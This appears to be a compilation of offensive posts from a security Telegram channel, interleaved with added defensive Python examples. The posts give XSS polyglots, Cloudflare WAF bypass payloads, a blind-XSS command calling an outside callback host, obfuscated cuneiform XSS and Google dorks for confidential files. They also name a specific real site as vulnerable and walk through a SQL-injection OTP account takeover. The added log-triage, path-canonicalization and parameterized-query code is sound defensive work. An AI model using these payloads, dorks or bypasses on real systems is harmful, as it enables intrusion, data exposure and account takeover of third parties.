Brut Security – Telegram
Payload for XSS + SQLi + SSTI/CSTI!

'"><noscript/onload=prompt(5);>{{7*7}}
XSS Oneliner

echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe


subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
Blind XSS In X-Forwarded-For Header

subfinder -d http://target.com | gau | bxss -payload '"><noscript src=https://hacker.xss.ht></noscript>' -header "X-Forwarded-For"
🫡Automate Your XSS
#!/bin/bash
read TARGET
subfinder -d "$TARGET" -silent | tee domains.txt
cat domains.txt | waybackurls | tee waybackurls.txt
cat waybackurls.txt | dalfox pipe
New XSS Bypass Cloudflare WAF 🧱

Payload: %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
New XSS Fly Under Radar Cloudflare Bypass 🧱

Payload:

"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>


Credit - Halim
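Taken together, the posts above (the XSS/SQLi/SSTI polyglot, the header-borne blind XSS, and the two Cloudflare bypasses built from mixed-case attribute names and double percent-encoding) show why a filter that matches one encoding and one letter case misses payloads. The following is an added example for reviewing request logs; it is not code from the channel or from any tool the posts mention. It percent-decodes a field until it stops changing, matches case-insensitively, and reports which probe classes it recognises, adding a marker when two or more decode rounds were needed. The INDICATORS patterns, the field names and the sample requests are constructed for this example; the sample values reuse the payload shapes from the posts, with the third-party callback host replaced by the reserved name example.invalid.

```python
import re
from urllib.parse import unquote

# Indicator patterns for the probe classes in the posts above. This is a
# log-review triage aid, not a WAF rule set: anything it misses still has to
# be stopped by output encoding and a Content-Security-Policy.
INDICATORS = {
    # tag break-out after closing a quoted attribute, an inline event handler,
    # a javascript: URL, or a script element
    "xss": re.compile(r"""["']\s*>\s*<|<\s*[a-z][^>]*\bon[a-z]+\s*=|javascript:|<\s*script\b""", re.I),
    # Jinja/Angular, JS-template and JSP/ASP-style expression delimiters
    "ssti": re.compile(r"\{\{.*?\}\}|\$\{.*?\}|<%.*?%>"),
}


def fully_decode(value, max_rounds=5):
    """Percent-decode until the string stops changing.

    Returns (decoded, rounds): rounds is how many passes changed the value.
    A request field that needs two or more passes was double-encoded, which
    is how a payload slips past a filter that decodes only once.
    """
    current, rounds = value, 0
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def classify(value):
    """Return the set of indicator names matched by one request field."""
    decoded, rounds = fully_decode(value)
    hits = {name for name, rx in INDICATORS.items() if rx.search(decoded)}
    if hits and rounds >= 2:
        hits.add("double-encoded")
    return hits


def review_request(path, headers):
    """Classify the query string and every header an application might
    reflect (the blind-XSS post used X-Forwarded-For). Returns {field: hits}."""
    query = path.split("?", 1)[1] if "?" in path else ""
    fields = [("query", query)] + list(headers.items())
    return {name: hits for name, value in fields if (hits := classify(value))}


# Constructed sample requests; the callback host from the header post is
# replaced with the reserved name example.invalid.
SAMPLE_REQUESTS = [
    ("/search?q=laptops", {"X-Forwarded-For": "203.0.113.7"}),
    ("/search?q='\"><noscript/onload=prompt(5);>{{7*7}}", {}),
    ("/", {"X-Forwarded-For": "\"><noscript src=https://example.invalid/x></noscript>"}),
    ("/?x=%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E", {}),
    ("/?x=%2522%253E%253Cb%253E", {}),   # constructed double-encoded tag break-out
]


def review_samples():
    """Run the triage over SAMPLE_REQUESTS; returns one findings dict per request."""
    return [review_request(path, headers) for path, headers in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for (path, _), findings in zip(SAMPLE_REQUESTS, review_samples()):
        print(path, "->", findings or "clean")
```

The value of the review is in prioritisation: a parameter or header that keeps receiving these probes is the one to check for context-aware output encoding first. Pattern matching alone is not a control, since payloads written without angle brackets or template delimiters (the cuneiform-identifier one in this channel is an example) carry none of these markers.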
📢An XSS payload, Cuneiform-alphabet based!
This payload was on trend back in 2020, but it still works :)

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟]𒁹")()

(Cuneiform is a logo-syllabic script that was used to write several languages of the Ancient Near East. The script was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.)

Source - Wikipedia
Google Dork - Sensitive Docs 📄

ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx
intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute”
Google Dork - Server Errors

inurl:"error" | innoscript:"exception" | innoscript:"failure" | innoscript:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
Google Dork - High % keywords 🚀
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
Dork: Apache Server Leakage
inurl:server-status "apache server status" "cpu usage"


Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a

Vulnerable Site- https://www.itronot.co.il/server-status
Look into subdomains that allow sign-in with Google, as they may contain sensitive information accessible only to team members.

Dork: site:*.example.com inurl:login | inurl:signin Google
Open Redirect Bypasses
Case Insensitivity Vulnerability

/api/docs/index.html ==> 403 Forbidden
/api/Docs/index.html ==> 200 OK
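The 403/200 pair above is what happens when an access rule matches the request path literally while the backend resolves it case-insensitively (Windows file systems and several frameworks do). The added example below is not code from the channel; it shows the canonicalization step a gateway or middleware should run before consulting its rules: drop the query string, percent-decode once, treat backslashes as separators, resolve dot segments and repeated slashes, then case-fold and compare on segment boundaries. PROTECTED_PREFIXES and the test paths are constructed for this example.

```python
import posixpath
from urllib.parse import unquote

# Constructed rule set: resources under /api/docs require an authenticated admin.
# Prefixes are stored in canonical form (lower-case, no trailing slash).
PROTECTED_PREFIXES = ("/api/docs",)


def canonical_path(raw_path):
    """Reduce a request path to the single form the backend will resolve.

    Two requests that collapse to the same string must receive the same
    authorization decision, so the rule matcher only ever sees this form.
    """
    path = raw_path.split("?", 1)[0]      # the query string is not part of the resource
    path = unquote(path)                  # decode once, like the origin server does
    path = path.replace("\\", "/")        # IIS-style separators
    path = "/" + path.lstrip("/")         # normpath keeps a leading '//', so collapse it first
    path = posixpath.normpath(path)       # resolves '.', '..', '//' and a trailing slash
    return path.lower()


def is_protected(raw_path):
    """True when the canonical path is a protected prefix or a descendant of one.

    Matching on a segment boundary keeps /api/docs-public from inheriting the
    rule for /api/docs.
    """
    canon = canonical_path(raw_path)
    return any(canon == p or canon.startswith(p + "/") for p in PROTECTED_PREFIXES)


def authorize(raw_path, is_admin):
    """Deny-by-default decision on the canonical path; returns an HTTP status."""
    if is_protected(raw_path) and not is_admin:
        return 403
    return 200


if __name__ == "__main__":
    for p in ("/api/docs/index.html", "/api/Docs/index.html", "/api/%44ocs//./index.html",
              "//api/docs/../docs/index.html", "/api/docs-public/readme"):
        print(p, "->", canonical_path(p), authorize(p, is_admin=False))
```

The safer design is to make the authorization check part of the handler that serves the resource rather than a path filter in front of it, so there is no second component with its own idea of what the path means; where a front-end rule is unavoidable, it has to canonicalize exactly as shown and the backend has to receive the canonical form rather than the original.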
SQL Injection to Account Takeover Manually :)
1. Enter the mobile number to log in and intercept the request:
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200

2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --

2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
You can see the 200 response.

Lastly, you can log in with the 1110 OTP and get access to the victim account :)

Credit - Kullai
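The probe sequence in the post (a single quote turns the 200 into a 500, a second quote restores it) is the signature of a mobile number pasted straight into SQL text, and the final query shows the consequence: the caller gets to supply the OTP, the timestamps and the attempt counter that the server should own. The added example below is not code from the channel; it is an OTP login written the other way round with Python's sqlite3 module. Every value is bound as a parameter, the OTP is generated server-side, it expires, it is single-use, and wrong guesses are counted and capped. The schema, OTP_TTL and MAX_ATTEMPTS are constructed for this example; the test stores the payload from the post and confirms it lands as an ordinary string.

```python
import secrets
import sqlite3
from datetime import datetime, timedelta, timezone

# Constructed schema mirroring the columns the post's payload supplied:
# mobile number, OTP, created time, attempt counter, updated time.
SCHEMA = """
CREATE TABLE otp_login (
    mobile_number TEXT    NOT NULL,
    otp           TEXT    NOT NULL,
    created_at    TEXT    NOT NULL,
    attempts      INTEGER NOT NULL DEFAULT 0,
    updated_at    TEXT    NOT NULL
);
"""

OTP_TTL = timedelta(minutes=5)   # constructed policy values
MAX_ATTEMPTS = 3


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def request_otp(conn, mobile_number, now=None):
    """Issue an OTP for a mobile number.

    The number is bound with '?', so quote characters in it are stored, not
    executed. The OTP, timestamps and attempt counter come from the server;
    nothing in the request body can set them.
    """
    now = now or datetime.now(timezone.utc)
    otp = f"{secrets.randbelow(10**6):06d}"
    conn.execute(
        "INSERT INTO otp_login (mobile_number, otp, created_at, attempts, updated_at) "
        "VALUES (?, ?, ?, 0, ?)",
        (mobile_number, otp, now.isoformat(), now.isoformat()),
    )
    conn.commit()
    return otp  # handed to the SMS gateway in a real system, never echoed to the caller


def verify_otp(conn, mobile_number, candidate, now=None):
    """Check a submitted OTP: latest row only, unexpired, under the attempt cap,
    constant-time comparison, and deleted on success so it cannot be replayed."""
    now = now or datetime.now(timezone.utc)
    row = conn.execute(
        "SELECT rowid, otp, created_at, attempts FROM otp_login "
        "WHERE mobile_number = ? ORDER BY rowid DESC LIMIT 1",
        (mobile_number,),
    ).fetchone()
    if row is None:
        return False
    rowid, stored, created_at, attempts = row
    if attempts >= MAX_ATTEMPTS or now - datetime.fromisoformat(created_at) > OTP_TTL:
        return False
    # count the attempt before comparing, so a wrong guess always costs one
    conn.execute(
        "UPDATE otp_login SET attempts = attempts + 1, updated_at = ? WHERE rowid = ?",
        (now.isoformat(), rowid),
    )
    conn.commit()
    if secrets.compare_digest(stored.encode(), candidate.encode()):
        conn.execute("DELETE FROM otp_login WHERE rowid = ?", (rowid,))
        conn.commit()
        return True
    return False


def stored_rows(conn):
    """Inspection helper: every (mobile_number, attempts) pair in the table."""
    return conn.execute("SELECT mobile_number, attempts FROM otp_login ORDER BY rowid").fetchall()


if __name__ == "__main__":
    db = open_db()
    request_otp(db, "8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --")
    print(stored_rows(db))   # the payload is one literal mobile_number value
```

The 500-on-quote behaviour from the post is also a useful server-side alert: a database syntax error logged immediately after a request containing a quote character means some code path still builds SQL by concatenation, and that is the path to fix before anyone reaches step 2.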